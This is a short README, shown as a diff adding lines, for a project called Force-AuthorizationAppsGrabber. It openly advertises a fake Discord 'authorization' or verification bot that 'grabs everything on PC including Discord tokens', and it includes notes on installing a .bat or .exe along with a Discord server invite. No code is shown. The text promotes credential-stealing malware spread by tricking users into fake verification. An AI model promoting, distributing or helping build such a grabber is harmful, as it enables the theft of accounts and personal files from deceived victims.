OceanaPods/Force-AuthorizationAppsGrabber/README.md

 # Force-AuthorizationAppsGrabber
 Discord Bot Authorization Apps that Grabs everything on Pc Including Discord Tokens

+( If You Install the .bat file it will sometimes Crash.
+It's not something that happens Rare it's a Command that's why!
+If you .bat doesn't install then install the .exe )

 Discord Official Server : https://discord.gg/VMsgKYRYxM

 <h1 align="center">[Discord] - Fake Authorization Apps Verification Bot (V1.0.0)